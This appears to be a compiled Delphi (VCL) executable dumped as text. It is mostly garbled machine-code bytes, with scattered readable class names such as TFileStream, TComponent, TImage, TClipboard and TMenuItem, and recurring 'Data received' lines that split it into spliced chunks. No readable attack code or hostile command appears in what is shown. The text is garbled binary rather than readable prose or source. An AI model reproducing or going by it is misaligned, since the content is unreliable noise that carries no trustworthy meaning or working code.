<@@9@\9@˜9@¨ëAPðAdðAðAðA¬ìA$ðA THandleStream‹À$¡A@¡A` A<@<@<@<@ <@@9@\9@$òA¨ëAPðAdðAðAðA¬ìA$ðA TFileStream˜¡A´¡AðŸA<@<@<@<@ <@@9@\9@˜9@¨ëAôëA ìA`òA¸/@˜òA0íATCustomMemoryStream¢A4¢AL¡A<@<@<@<@ <@@9@\9@¼òA¨ëA`óA ìA`òAôA˜òA0íAŒóA TMemoryStream‹À¢A¬¢A¾¢A ðŸA<@<@<@<@ <@@9@\9@˜9@¨ëA õA ìA¬ôAìôA$õA0íAà@ TStringStream£A4£AL¡A<@<@<@<@ <@@9@\9@ðöA¨ëAôëA ìA`òA(÷A˜òA0íATResourceStream̃D$ì‹D$‹ÿ`ƒD$ì‹D$‹ÿ` ƒD$ì‹D$‹ÿ`ƒD$ì‹D$‹ÿ`ƒD$ì‹D$‹ÿ`ƒD$ì‹D$‹ÿ`ƒD$ì‹D$‹ÿ` ƒD$ì‹D$‹ÿ`$ƒD$ì‹D$‹ÿ`(ƒD$ì‹D$‹ÿ ƒD$ì‹D$‹ÿ`ƒD$ìéXÅþÿƒD$ìévÅþÿƒD$ìé€ÅþÿÌÌÞ£Aè£Aò£AãAУAE£AS£Aa£Ao£A}£A‹£A™£A§£Aµ£A ÀFþ£A‹À¤¤A6¤AФA@<@i@ i@<@ <@0i@\9@Œ]BÄ]B,^B”^B_B|_B|aBˆaB”aB aB¬aB(bBTStreamAdapter,¥A,¥A@<@<@<@<@ <@@9@\9@|µA TClassFinder@ˆ¥A˜¥A(@<@<@<@<@ <@@9@\9@ˆ÷A°÷A¸/@¸/@¸/@TFilerì¥
Data received A¦A&¦A|<¥A<@<@<@<@ <@@9@\9@HþA°÷A¨þAÜþAðBÌÿAø BìÿAÈ!B°!B,Bà@pTReader‹À|¦A¦A¢¦AL<¥A<@<@<@<@ <@@9@\9@|&B\'B´&BÜ&B'B+Bà@,TWriter‹Àø¦Aø¦A ¬†@<@<@<@<@ <@@9@\9@˜9@EThreadL§AT§A<@<@°NB<@<@ <@@9@\9@HNBdOB¸/@TThread`§A TComponentNamet§AIDesignerNotify@èq¹¦ãѪ±ÀO±o¼Classesÿÿ‹À̃ÀØ髲ƒD$؋D$‹ÿ`(ƒD$ØéS²ƒD$Øéi²ƒD$ԋD$‹ÿ`(ƒD$Ôé1²ƒD$ÔéG²Ì±§A¿§AɧA©§AÓ§Aá§Aë§AX‹â†ìYEÍkO‚AQíö§A(ÀF¨A,‹Àœ¨A¨ĄAP©AÞ¨A@©A0„™A¼YB<@SB<@ <@@9@\9@˜RB´ÉAÄUBÐÈAœVBhUB¬VB¤WBÔYB¼VB´VBÜYBLRB\§Aýÿüÿûÿÿÿúÿùÿøÿ÷ÿöÿõÿôÿóÿòÿþÿñÿðÿPVBXVB\VBtVB¨VBxVB€VB„VBVB<WBPWBlYB|VB`VBLVB”YB TComponentP©A TComponentœ¨Aø™AClasses\§Aÿþ€€Namel@ ÿ ÿ€Tag@ü©AªA@<@<@<@<@ <@@9@\9@¨ZB¤ZBÜZB<[B[B@[B`ZBôZBH[BTBasicActionLink@|ªAàªAĪA̪ATP¨A¼YB<@SB<@ <@@9@\9@˜[B´ÉAÄUBÐÈAœVBø[B¬VB¤WBÔYB¼VB´VBÜYBT[B¸\B\\Bð[B \Bô[B@\Bïÿ$\B TBasicAction@àªA TBasicAction|ªAL©AClasses‹À«ATIdentMapEntryà@SVW‹ù‹ò‹Ø‹Ï‹Ö‹ÃèlÅþÿ_^[ÃQf‰$f‰T$‹$ZÐU‹ìSVW‹ù‹ò‹Ø‹E P‹EP‹Ï‹Ö‹ÃèÅþÿ_^[]‹ÀU‹ìSVW‹ù‹ò‹Ø‹E P‹EP‹Ï‹Ö‹Ãè1Åþÿ_^[]‹Àƒ8ÿuƒxÿt3ÀðÍ@Q‰$fƒ<$ÿufƒ|$ÿt3ÀZðZЬA¬A@<@<@<@<@ <@@9@\9@Ø­A TRegGroup‹Àt¬At¬A$@<@<@<@<@ <@@9@\9@±A TRegGroups‹@ èøÍ@SVWUƒÄø‰T$‰$3í‹$‹@ ‹pN…ö|8F3ÿ‹$‹@ ‹×è"‹Ø‹Ó‹D$èþÿ„Àt…ít ‹Õ‹Ãèþÿ„Àt‹ëGNuˋÅYZ]_^[ÐU‹ìQSVW‰Mü‹ú‹]…ÿt ‹Ó‹Çè„ÿÿÿ‹ðë3öƒ}üt‹Ó‹Eüènÿÿÿ‹Øë3ۅöu …Ûu3Àë!‹Eüë…Ûu‹Çë‹Ó‹Æ蚎þÿ„Àt‹Çë‹Eü_^[Y]@U‹ìQSVW„ÒtƒÄð豏þÿ‹ùˆUÿ‹Ø3ҋÃèù‹þÿ²¡t˜Aèí‹þÿ‰C²¡ØžAèދþÿ‰C²¡t˜Aèϋþÿ‹ð‰s ‹Æ‹×èɋÀ}ÿt贏þÿdƒÄ ‹Ã_^[Y]ËÀSV詏þÿ‹Ú‹ð‹Ó€âü‹Æ詋þÿ‹F豋þÿ‹F詋þÿ‹F 衋þÿ„Û~‹Æè^þÿ^[Í@SVWUQ‰$‹è‹E‹pN…ö|!F3ۋE‹Ó袋ø‹$‹ÇèƊþÿ„Àu%CNuâ‹E‹$‹ÿQT‹Ø…Û|‹E‹Ó‹ÿQ‹øë3ÿ‹ÇZ]_^[ÐSVWUQ‹ê‹øÆ$‹G ‹XK…Û|C3ö‹G ‹Öè?‹Ð‹Åè:þÿ„ÀuFKuåÆ$Š$Z]_^[ÐU‹ìÄôþÿÿSV3ɉMü‹ò‹Ø3ÀUhW¯Adÿ0d‰ •üþÿÿ‹Æè Šþÿ•üþÿÿEü诛þÿ‹Uü‹Ãèÿÿÿ…Àt0‹Eü‰…ôþÿÿƅøþÿÿ …ôþÿÿPj‹ »]²¡Œ”Aè‚?ÿÿèQ’þÿ‹Ö‹Cè?3ÀZYYd‰h^¯AEüèޘþÿÃéô‘þÿëð^[‹å]ÃSV‹ò‹Ø‹Ö‹CèÄ…ÀÀ^[ÃSV‹Ú‹ð…Ût‹Æè²þÿ;Øt3À^[ð^[ÐSVW‹ú‹ð‹F ‹XKƒû|%‹Ó‹F è#‹×è¼ÿÿÿ„Àt ‹Ó‹F èþKƒûÿuۋF‹XKƒû|%‹Ó‹Fèò‹×è‹ÿÿÿ„Àt ‹Ó‹FèÍKƒûÿuۋF‹ÿR‹ØKƒû|%‹Ó‹F‹ÿQ‹×èVÿÿÿ„Àt ‹Ó‹F‹ÿQHKƒûÿuÛ_^[ËÀSVWUQ‰$‹ø‹G ;$t1‹$‰G ‹G‹pN…ö| F3í‹G‹Õèl‹Ø‹$‹ÃèüýÿÿˆCENuãZ]_^[Í@SVW„ÒtƒÄð腌þÿ‹Ú‹ø3ҋÇèЈþÿ²¡t˜AèĈþÿ‰GGPèäÃþÿ‹ „™A²¡Ð«AèŠüÿÿ‹ð‹G‹Öè¢ÆF‹Ç„Ût苌þÿdƒÄ ‹Ç_^[Í@SVWUèŒþÿ‹
Data received mmdlg_FindReplaceWndProcPtr%.8X%.8Xl)]d³]h)] º]d)]ø²]`)]½]\)]<º]X)](¹]T)]¼»]P)]0·]L)]h¹]H)]˜·]D)]d¾])]L´] )]м])]p½])]d¸]U‹ì3ÀUhªcCdÿ0d‰ ÿxÊ]u+fƒ=¤(]t f¡¤(]PèÝýÿ¸)]¹ ‹à@èÜòüÿ3ÀZYYd‰h±cCÃé¡Ýüÿëø]Ѓ-xÊ]s3¸ bCèyáüÿè8þÿÿ¡¸¼Eè:Tþÿ¡¸¼EèÐTþÿ‹¸¼E¡\LCèlTþÿÍ@@dCìdCÐdCÞdC€xÇE¼YB<@SB<@\F@9@\9@ yC<'F4FÐÈA'FàúELúEøFÔYB¼VB´VBÜYByCÌFt~C˜FTùE˜FüÿE$ FœøE øEÔ(F)FàFúElFäFøF¤FÈF„)Fä F FÌûEp F{C×ÿÇÿÐyCp|CTImage@ìdCTImage@dClÈE*ExtCtrls¨¬E[ÿ$ûE€ AlignгEaÿdùEúE€ Anchors@\ÿ\þ€ AutoSize@yÿÜ|C€Centerx´Etÿ+F€€ Constraints¬Ezÿzÿ€ôÿÿÿ DragCursor,³E›ÿ›ÿ€DragKind¤²E]ÿ`þ€DragMode@Pþdþd&F€Enabled@zÿzÿ€IncrementalDisplay@šÿ„F€ParentShowHint°tBhÿô|C€€Picture(G|ÿÈF€€ PopupMenu@}ÿ4}C€ Proportional@™ÿ`F(F€€ShowHint@xÿ}C€Stretch@{ÿ}C€ Transparent@Wÿ0FÄ&F€Visibleð’A ÿ ÿä&F€€OnClick\¼E0ÿ0ÿ€€OnContextPopupð’A(ÿ(ÿ€€ OnDblClick ·Eèÿèÿ€€ OnDragDrop˜¶Eðÿðÿ€€! OnDragOverÈ·Eÿÿ€€" OnEndDockÈ·Eÿÿ€€# OnEndDrag4µEÐÿÐÿ€€$ OnMouseDown¬µEØÿØÿ€€% OnMouseMove4µEàÿàÿ€€& OnMouseUpÐqBpÿpÿ€€' OnProgressˆ¹Eÿÿ€€( OnStartDock€·Eÿÿ€€) OnStartDrag@|iC TBevelStylexiC bsLoweredbsRaisedExtCtrls‹À¸iC TBevelShape´iCbsBoxbsFrame bsTopLine bsBottomLine bsLeftLine bsRightLinebsSpacerExtCtrlsljCkCüjClxÇE¼YB<@SB<@\F@9@\9@ȁF<'F4FÐÈA'FàúELúEøFÔYB¼VB´VBÜYBÜ~CÌFÈF˜FTùE˜FüÿE$ FœøE øEÔ(F)FàFúElFäFøF¤FÈF„)Fä F FÌûEp F°€CTBevelkCTBevelljClÈEExtCtrls¨¬E[ÿ$ûE€ AlignгEaÿdùEúE€ Anchorsx´Etÿ+F€€ Constraints@šÿ„F€ParentShowHint´iCiÿdC€Shape@™ÿ`F(F€€ShowHintxiChÿHC€Style@Wÿ0FÄ&F€VisibleˆlCÌlC¸lCÀlCDP¨A¼YB<@SB<@ <@@9@\9@ˆƒC´ÉAÄUBÐÈAœVBhUB¬VB¤WBÔYB¼VB´VBÜYB8ƒCïÿø„CTTimerÌlCTTimerˆlCL©AExtCtrls@@ÿÀ„C€Enabled¬@0ÿЄC€èIntervalð’A8ÿà„C€€OnTimerœmC¨nChnC”nC$˜ÈE¼YB<@SB<@¼JF@9@\9@HŒF\zF„BFÐÈA'FàúE8/FøFÔYB¼VB´VBÜYB …CpuF`‹CØyFTùEìoF p
Data received CD‘C\C¼CèC TClipboard<C TClipboardCø™AClipbrdU‹ìQ‰Eü‹Eü‹ÿR3ÀUh”Cdÿ0d‰ èÖéüÿ3ÀZYYd‰h›C‹Eü‹ÿRÃé·°üÿëðY]ËÀS‹Øƒ{t€{ u ‹Ã‹ÿRÆC [ÃS‹Øƒ{t!ÿKƒ{uè™èüÿ€{ t‹CèkÓþÿ3À‰C[ÃS‹Øƒ{uK¡¼º]‹‹@0‰C…ÀuSh̗Cè‹Òþÿ‰CÆC ‹CPè‡ìüÿ…Àu‹ ´]²¡¬†@èE]ýÿèP°üÿÆC ÿC[Í@SV‹Ú‹ð‹CP‹CP‹P‹FPè^èüÿ‰C ^[ÃU‹ìƒÄøSVW‹ù‹ò‰Eü‹]‹Eü‹ÿR3ÒUh6’Cdÿ2d‰"Sh èÄâüÿ‰Eø3ÒUh’Cdÿ2d‰"‹EøPèÊâüÿ3ÒUh÷‘Cdÿ2d‰"‹Ð‹Ç‹Ëè)›üÿ‹EüèÍþÿÿ‹EøP·ÆPè”ìüÿ3ÀZYYd‰hþ‘C‹EøPè¦âüÿÃéT¯üÿëï3ÀZYYd‰ë鏬üÿ‹EøPè^âüÿ蕯üÿèä¯üÿ3ÀZYYd‰h=’C‹Eü‹ÿRÃé¯üÿëð_^[YY]‹ÀSV‹ò‹Ø‹Æè÷ýÿ@P‹Îfº‹Ãèÿÿÿ^[ÐU‹ìƒÄøS‹Ú‰Eü‹Eü‹ÿRjèqèüÿ‰Eø3ÀUhڒCdÿ0d‰ ƒ}øt‹EøPèÙáüÿ‹Ð‹Ã萷üÿë‹Ãèµüÿ3ÀZYYd‰há’Cƒ}øt ‹EøPèËáüÿ‹Eü‹ÿRÃéq®üÿëá[YY]ËÀSV‹ò‹Ø‹Æè¸üÿ@P‹Æèºüÿ‹Èfº‹ÃèYþÿÿ^[ËÀU‹ìQSVW‹ú‰Eü‹Eü‹ÿR3ÒUh²“Cdÿ2d‰"jèCçüÿ‹Øf…ÛtE‹Ó¡(tBè`(ÿÿ„Àt%·ÃPè›çüÿ‹ðj è’çüÿP‹Î‹Ó‹ÇèN'ÿÿèÁ®üÿëD·ÃPèþæüÿ‹Øf…Ûu»‹ 8µ]²¡¬†@èáZýÿèì­üÿ3ÀZYYd‰h¹“C‹Eü‹ÿRÃ陭üÿëð_^[Y]ÐU‹ìQSVW‹ú‰Eü‹Eü‹ÿR3ÀUh”Cdÿ0d‰ jè çüÿ‹Øj èçüÿ‹ðV‹Ëfº‹Ç‹ÿS\3ÀZYYd‰h”C‹Eü‹ÿRÃé3­üÿëð_^[Y]Í@U‹ìQSV‹ò‰Eü‹Eü‹ÿR3ÒUh}”Cdÿ2d‰"jè¤æüÿ‹Øj è›æüÿP‹Ëfº‹Æ‹ÿS\3ÀZYYd‰h„”C‹Eü‹ÿRÃéάüÿëð^[Y]Í@SV‹Ú‹ð‹Ã‹(tB衦üÿ„Àt ‹Ó‹Æèdþÿÿ^[ËËtwB脦üÿ„Àt ‹Ó‹Æè÷þÿÿë%‹Ã‹4vBèh¦üÿ„Àt ‹Ó‹ÆèCÿÿÿë ‹Ó‹ÆèÄ4þÿ^[ÐU‹ìƒÄðS‹Ú‰Eü‹Eü‹ÿR3ÀUhi•Cdÿ0d‰ ‹Eüè‚ûÿÿ3À‰EðEðPMøUö‹ÃèL&ÿÿ‹EøP·EöPè2éüÿƒ}ðt ‹EðPj è!éüÿ3ÀZYYd‰hp•C‹Eü‹ÿRÃéâ«üÿëð[‹å]Í@U‹ìƒÄðS‹Ú‰Eü‹Eü‹ÿR3ÀUhí•Cdÿ0d‰ ‹Eüèþúÿÿ3À‰EðEðPMøUö‹Ã‹ÿS`‹EøP·EöPè®èüÿƒ}ðt ‹EðPj èèüÿ3ÀZYYd‰hô•C‹Eü‹ÿRÃé^«üÿëð[‹å]Í@SV‹Ú‹ð‹Ã‹(tBè1¥üÿ„Àt ‹Ó‹ÆèØþÿÿ^[ËËÔrBè¥üÿ„Àt ‹Ó‹Æè?ÿÿÿë ‹Ó‹ÆèŒ2þÿ^[ÐU‹ìƒÄøS‹Ú‰Eü‹Eü‹ÿR3ÀUhŒ–Cdÿ0d‰ ·ÃPèäüÿ‰Eø3ÀZYYd‰h“–C‹Eü‹ÿRÃ鿪üÿëð‹Eø[YY]ÐU‹ìQSV‹ñ‹Ú‰Eü‹Eü‹ÿR3ÀUhç–Cdÿ0d‰ ‹EüèÙùÿÿV·ÃPè£çüÿ3ÀZYYd‰hî–C‹Eü‹ÿRÃédªüÿëð^[Y]ÐU‹ìQS‹E‹@ü‹ÿR3ÀUhc—Cdÿ0d‰ ÆEÿjè_ãüÿ‹Øf…Ût&‹Ó¡(tBè|$ÿÿ„ÀtÆEÿë·ÃPè9ãüÿ‹Øf…ÛuÚ3ÀZYYd‰hj—C‹E‹@ü‹ÿRÃéè©üÿëíŠEÿ[Y]Í@U‹ìQS‹Ú‰Eü·ÃPèMåüÿ…Àuf;ŒÊ]u UèZÿÿÿY„Àu3Àë°[Y]Í@ƒ=”Ê]u²¡ÄCè·¡üÿ£”Ê]¡”Ê]ÃU‹ìQSVW‰Eü3ÀUhö—Cdÿ0d‰ ‹Eü‹ÿQ 3ÀZYYd‰ë+顦üÿ¡ ¹]fƒxt‹ ¹]‹Uü‹Cÿë蔩üÿèã©üÿ_^[Y]ÐSVèY¥üÿ‹Ú‹ð;5”Ê]u3À£”Ê]‹Ó€âü‹ÆèV0þÿ„Û~‹Æè¥üÿ^[ÃU‹ì3ÀUh˜Cdÿ0d‰ ÿÊ]u ¡”Ê]è)¡üÿ3ÀZYYd‰h”˜CÃ龨üÿëø]ËÀƒ-Ê]s'h̘CèAåüÿf£ŒÊ]hܘCè1åüÿf£ŽÊ]3À£”Ê]ÃDelphi PictureDelphi ComponentU‹ì3ÀUh™Cdÿ0d‰ ÿ˜Ê]3ÀZYYd‰h™CÃé6¨üÿëø]ËÀƒ-˜Ê]Ã,™C TButtonLayout(™C blGlyphLeft blGlyphRight blGlyphTop blGlyphBottomButtons‹Àˆ™C TButtonStyle„™C bsAutoDetectbsWin31bsNewButtons‹À̙C TNumGlyphs@0šC¬šC$ˆ±E<@<@<@<@ <@@9@\9@¨ZB˜·CÜZBtõE[B öE`ZBôZBH[B`ôE¼·CÔôE¸C ÎFLöEõEHÎF\ÎF@õE„ÎFœõE8¸C¼õEX¸CÐöE°öEðöEÜõE¨ÎF¬ÎFöEpóETSpeedButtonActionLink›CœC ›CœC„xÇE¼YB<@SB<@\F@9@\9@8¹C<'F4FÐÈA ¾CàúELúEøFÔYB¼VB´VBÜYBx¸CÌFÈF˜FTùE˜FüÿE$ FœøE øEÔ(F)FàFúElFäFøF¤
Data received „Àt‹ƒPjh‹Ãè‡ïPèyþûÿ[Í@SV‹ò‹Ø;³t&‰³‹Ãèeò„ÀtjVh‹ÃèNïPè@þûÿ^[Ð:t ˆèÑÄÃS‹Ø‹Ãè*ò„ÀtRƒ»,u!ƒ»0ujjh‹ÃèïPèòýûÿë(f‹“0f‹ƒ,èÿûÿPjh ‹ÃèÖîPèÈýûÿ[ËÀ;,t ‰,è‰ÿÿÿÃ;0t ‰0èuÿÿÿÃSfƒ¸:t‹Ø‹Ð‹ƒ<ÿ“8[Í@SVWUƒÄЋú‹Ø萖èk—„À„±‹Gƒxô…­‰$‹$‹@ Ht -té…ÇG 鉋$‹@$Ht ƒètié_T$‹Ã‹ÿQD‹Ãf¾µÿèyºûÿ„Àt"j3ɺ)‹Ã豖¨ujÿjÿD$ Pè?ûûÿjjD$ P‹Ãè×íPè핋T$‹JZèX˜éûD$Pjh‹Ãè¬íPèžüûÿ3í‹Ãf¾µÿèºûÿ„ÀtE€»u,T$ ‹Ã‹ÿQD‹D$ ʼnD$T$ ‹Ã‹ÿQD‹D$(+ʼnD$ ë*T$ ‹Ã‹ÿQD‹D$$ʼnD$T$ ‹Ã‹ÿQD‹D$,+ʼnD$‹D$P‹D$P‹D$P‹D$Pèôûÿ‹ðV‹D$‹@PèÜõûÿè#•L$²"è ›D$Pjj‹ÃèììPè•‹T$‹JZèm—VèÛóûÿj‹D$‹@Pè”õûÿ3À‰G ë3À‰G ë ‹×‹Ã‹ÿQðƒÄ0]_^[ÐSVWƒÄð‹ú‹Ø豔茕„Àtb‹Ô‹Ã‹ÿQD‹Ãf¾µÿèä¸ûÿ„Àt"j3ɺ)‹Ã蕨ujÿjÿD$PèªùûÿjjD$P‹ÃèBìPèX”‹OZèǖÇG ë ‹×‹ÃèuЃÄ_^[ËÀU‹ìS‹Á‹M’‹ÿS []ÂU‹ìS‹Á‹M’‹ÿS[]ÂU‹ìƒÄÜSVW„ÒtƒÄðè·¹ûÿ‹ñˆUÿ‹Ø‹ÆèLýÿ‰C(‹Î3ҋÃè£HýÿÇC$2ÆC ƒÈÿ‰CÇEß3҉Uã‹S$‰Uç‰E÷‹þ‹Çè|èî„Àt‹ÃèðHýÿP‹ÇèdèsëMßZ莋þÿ‹Ã€}ÿt葹ûÿdƒÄ ‹Ã_^[‹å]ËÀSVWU胹ûÿ‹Ú‹è‹}‹÷‹Çèè.î„Àt‹ÅèHýÿP‹EèèëZè?‹þÿ‹Ó€âü‹ÅèHýÿ‹Æè „Û~‹Åè¹ûÿ]_^[ÃSV‹ò‹Ø‹Ö‹ÃèQEýÿSh¤„DSh̄Dƒ{$ÿžÁº˜„D‹Æ‹ÿS^[Ãÿÿÿÿ WidthTypeSV‹Ú‹ð‹ÃèkŠýÿ‹Ã贉ýÿ‹Ð‹Æè·‹Ãè\Šýÿ^[ÐSV‹Ú‹ð‹Ãèw¬ýÿ‹V$‹Ãè¡«ýÿ‹Ãèn¬ýÿ^[Í@U‹ìƒÄø‹E‹@ü‹@è,‰Eø‹Eøè9í„À…Æ‹Eøf‹@f#ä…Df‹è…Df;Ð…¨‹Eø€¸‰…˜‹Eø‹€H…Àu²¡È¡Aè´ûÿ‹Uø‰‚Hë jjè†fýÿh‹Eø‹ˆH²¡0¦Aè´qýÿ‰Eü3ÀUhօDdÿ0d‰ ‹E‹@ü‹P‹Eüè£ýÿ3ÀZYYd‰h݅D‹Eüèå³ûÿjj‹Eø‹€Hè¿eýÿÃéu»ûÿëÞYY]ÃU‹ìQSV‰Eü‹Eü‹@èJýÿ‹ØK…Û|C3ö‹Eü‹@‹ÖèJýÿƒx$ÿ~FKué‹Eü‹@èèIýÿ;ð•Â‹EüèWFýÿUè±þÿÿY^[Y]Í@L†D.86l@ComCtrls‹ÀU‹ìjSVW‹ð3ÀUh‡Ddÿ0d‰ ‹ÆèQGýÿ‹FèIýÿPEü¹‹H†DèÙûÿƒÄ‹FèbIýÿ‹øO…ÿ|G3ۋӋFèVIýÿ‹@(‹Uü‰šCOué‹Fè9IýÿP‹FèLè[è‹MüZ莊þÿ3ÀZYYd‰h‡DEü‹H†Dè3ÚûÿÃé=ºûÿëê_^[Y]ÐSV‹ò‹Ø‹C‹Öè$ÅûÿtC‹ÖèPÁûÿ‹Ãè­þÿÿ^[ËÀS‹Øƒ{$u‹Ãè`EýÿP‹CèÓèâçZè(ˆþÿ‰C$‹C$[Ê@ 4ËÀ;P$t$‹H;Ñ}…Ò|‹Ñë ‹H…É~;Ê}‹Ñ‰P$èKþÿÿËÀSV‹Ú‹ð:^ t'‹ÆèþDýÿ…Àtˆ^ 3ҋÆèÊDýÿ‹Fèb‹ÿ’€^[Í@SV‹Ø:S t'ˆS ‹Cè@…Àt‹Cè4f¾îÿ諳ûÿ‹Ãèàýÿÿ^[Ð;Pt‰PèÏýÿÿËÀ;Pt ‰P3ÒèaDýÿÃ;Pt ‰P3ÒèQDýÿÃSV‹ò‹Ø‹Æ‹Ì+Dèí²ûÿ„ÀtOŠV ‹ÃèCÿÿÿŠV ‹Ãèqÿÿÿ‹V‹Ãè§þÿÿ‹V‹Ãè‘ÿÿÿ‹V‹Ãè—ÿÿÿ‹V‹Ãèÿÿÿ‹Æèªþÿÿ‹Ð‹ÃèÕþÿÿ^[Ë֋Ãè!@ýÿ^[ËÀSV‹ò‹Ø‹Æ‹SèÄ¿ûÿƒ>u ‹Ö‹ÃèúCýÿ^[Í@SVW„ÒtƒÄðè9´ûÿ‹ñ‹Ú‹ø‹ Ì+D3ҋÇèEýÿ‰w‹Ç„Ûtèn´ûÿdƒÄ ‹Ç_^[ËÀSV‹ò‹Ø‹Ö‹ÃèñFýÿ^[ËÀ‹@Ë@ÃSV‹ò‹Ø…öt‹ÆèkCýÿP‹ÃèßÿÿÿZèEE^[ËÃèÏÿÿÿèöD^[Í@U‹ìƒÄÜSVW‰Eü}܋Eüè­ÿÿÿèÀè„À„¾‹Eü‹ÿR 3ÀUhGŠDdÿ0d‰ ‹EüèfFýÿ‹ØKƒû|‹Eüèrÿÿÿèå‹Ó讅þÿKƒûÿuæ‹Eüè<Fýÿ‹ðN…ö|EF3ÛÇ3À‰G‹Ó‹Eüè%ÿÿÿ‹@$‰G‹Eüè+ÿÿÿè:å‹Ï‹ÓèU…þÿ‹Ó‹Eüèÿþÿÿ‰X(CNu¾‹Eüèÿÿÿè+D3ÀZYYd‰hNŠD‹Eü‹ÿR$Ãé·ûÿëð_^[‹å]Í@SV„ÒtƒÄð躲ûÿ‹Ú‹ð3ҋÆèµAýÿÇF ÿFè²½ûÿ‹Æ„Ûtèë²ûÿdƒÄ ‹Æ^[ÃSV‹ò‹Ø‹Æ‹Sèܽûÿ^[ÐSV‹ò‹ØC‹ÖèȽûÿ²‹ÃèÇAýÿ^[ÃЊD.96ÿÿÿÿComCtrls‹ÀU‹ìƒÄøSVW3ɉMü‹ø3ÀUhª‹Ddÿ
Data received ùÿ3ÀZYYd‰hóF‹Eüè—FùÿÃé9Nùÿëð_^[Y]Ãÿÿÿÿ comctl32.dllcomctl32.dllImageList_WriteExÿ@\ÃVƒx\~ÿH\€xXt Æ@Xf¾ïÿè3Hùÿ^ÐSVèJùÿ‹Ú‹ð‹F…Àt‹ÖèW÷ÿÿ‹Ó€âü‹ÆèóEùÿ„Û~‹ÆèÀIùÿ^[ÐSfƒx t ‹Ø‹P‹C ÿS[Í@U‹ì3ÀUhñóFdÿ0d‰ ÿ¬Ë]3ÀZYYd‰høóFÃéZMùÿëø]ËÀƒ-¬Ë]ÃPôFPôF ¬†@<@<@<@<@ <@@9@\9@˜9@ EMenuError`ôF TMenuBreak\ôFmbNonembBreak mbBarBreakMenus@ ôFTMenuChangeEventSenderTObjectSource TMenuItemRebuildBooleanp@tøF@øôFTMenuDrawItemEventSenderTObjectACanvasTCanvasARectTRectSelectedBooleanp@äpB@dõFTAdvancedMenuDrawItemEventSenderTObjectACanvasTCanvasARectTRectStateTOwnerDrawStatep@äpBøq@ÜõFTMenuMeasureItemEventSenderTObjectACanvasTCanvasWidthIntegerHeightIntegerp@äpBl@l@‹ÀLöFTMenuItemAutoFlagHöF maAutomaticmaManualmaParentMenus”öF TMenuAutoFlagHöFMenus‹À÷F€÷FˆÇF<@<@<@<@ <@@9@\9@¨ZB0 GÜZBH G[B G`ZBôZBH[Bt G¬ GÜ Gp G G ÎF< G¬ Gà G Gp G G° GÐ G”ÎFð GœÎF ÎF G0 GP Gp GL GTMenuActionLinkÜ÷F$øFxøF>øFjøF¬P¨A¼YB<@SB<@ <@@9@\9@8 G6GHGÐÈAG|6G¬VB¤WBÔYB¼VB´VBÜYB¼ GL(GœGü)Gh1G$/G\0Gà@0à@Xïÿîÿýÿùÿøÿòÿñÿ 3G -Gp.G¨.G3Gü2Gü+G TMenuItemxøF TMenuItemÜ÷FL©AMenusܪA-G,2G€€Action@¨ÿ¨ÿ€ AutoCheckHöF;ÿ0>G€ AutoHotkeysHöF<ÿ¬?G€AutoLineReduction8xB2Gœ2G€€Bitmap\ôFHÿ,G€Breakà@0ÿ,Gä4G€€Caption@8ÿ€,G5G€ CheckedLÙF|ÿÐ6G€€ SubMenuImages@:ÿÈ.G€ Default@9ÿÔ,G$5G€ Enabled„@?ÿL-G€ GroupIndex„’ATÿTÿd5G€ HelpContextà@XÿXÿD5G€€Hint„ØF@ÿ.G„5G€ÿÿÿÿ ImageIndex@=ÿt3G€ RadioItemؒA`ÿÜ-G¤5G€ShortCut@>ÿð-GÄ5G€Visibleð’Aˆÿˆÿä5G€€OnClickôôFÿÿ€€ OnDrawItem`õF˜ÿ˜ÿ€€OnAdvancedDrawItemØõF ÿ ÿ€€ OnMeasureItem@üF<üFlüFNüFbüFXP¨A¼YB<@SB<@ <@@9@\9@°@G´ÉAÄUBÐÈAIG¤IG¬VB¤WBÔYB¼VB´VBÜYB@GðHGAG IGà@<ýÿùÿïÿè@GAGøDGTMenulüFTMenuüFL©AMenustøF4ÿ€€Items@ôüF@ýF0ýF`´ûF¼YB<@SB<@ <@@9@\9@°@G´ÉAÄUBÐÈAIG¤IG¬VB¤WBÔYB¼VB´VBÜYB@GðHGàNG$NG TMainMenu‹À@ýF TMainMenuôüFhüF MenusöFÄMGÔMG€ AutoHotkeysöFäMGôMG€AutoLineReduction@\ÿNG€ AutoMerge¨‘A0ÿLMGFG€€BiDiModeLÙFHÿhIG€€Images@@ÿ,HG€ OwnerDraw@Aÿ`MG€ ParentBiDiMo
Data received j¹ú3ҋEüèµðÿÿ…Àuë3ÀZYYd‰h’-I‹Eüè´„Àu‹EP‹Mô‹Uø‹EüèÿÿÿÃéÀ÷ÿëÚ3ÀZYYd‰ë éû÷ÿè^÷ÿ3ÀZYYd‰hÅ-I3ҋEü‹ÿQ<Ãé÷ÿëî_^[‹å]‹ÀU‹ìjjjjjjSVW‹ñ‹ú‰Eü3ÀUh›/Idÿ0d‰ 3À‰‹Eü‹Ì±‹E èšÿÿ‰E ‹Eü‹Ð±‹Eè„ÿÿ‰E3À‰Eô3ۋNj¨Aè ÷ÿ„Àt‹ßë0‹Ç‹ðŸAèð ÷ÿ„Àt‰}ôëUð¡|³]èò>÷ÿ‹Uð¡<ðHèÙ÷þÿjj3ҋEü‹ÿQ43ÒUhq/Idÿ2d‰"EøP‹M‹U ‹Eüèßëÿÿ‹Eø‹Uè¤÷ÿu è÷ÿéÀ‹Eü‹€ …À~%;}!Uì¡Ø¸]è‚>÷ÿ‹M첡”úHè/÷þÿèž÷ÿ€}t#º´/I‹Eøèï@ÿÿ„ÀtEø¹ºè‘÷ÿÿ…Ût‹Uø‹Ã‹ÿQ8égÿÿÿƒ}ô„]ÿÿÿ‹EPEè¹À/I‹Uøè ÷ÿ‹Uè‹M ‹Eôè0?ÿÿé6ÿÿÿ3ÀZYYd‰hx/I3ҋEü‹ÿQ<ÃéÚ÷ÿëî3ÀZYYd‰h¢/IEèºèÆ÷ÿEøèš÷ÿÃé°÷ÿëã_^[‹å]Âÿÿÿÿ..ÿÿÿÿ U‹ìƒÄèSVW3ۉ]è‰]ì‰]ðˆM÷‰Uø‰Eü‹u3ÀUhÿ1Idÿ0d‰ ‹Æè;÷ÿ‹Eü‹Ì±‹Eèœÿÿ‰E‹Eü‹Ð±‹E è†ÿÿ‰E ƒ}} ‹Eü‹€¨‰E‹M ‹U‹Eüè+çÿÿ‹Ø‹è¶÷ÿ‹ø;}F3ÀŠÃƒÀøƒø‡èŠ€v0Iÿ$…Š0IQ1I¢0IÚ0IŸ1IŸ1IŸ1I…ÿŽõ‹×J‹ÆèÜ÷ÿ€}÷„á‹E 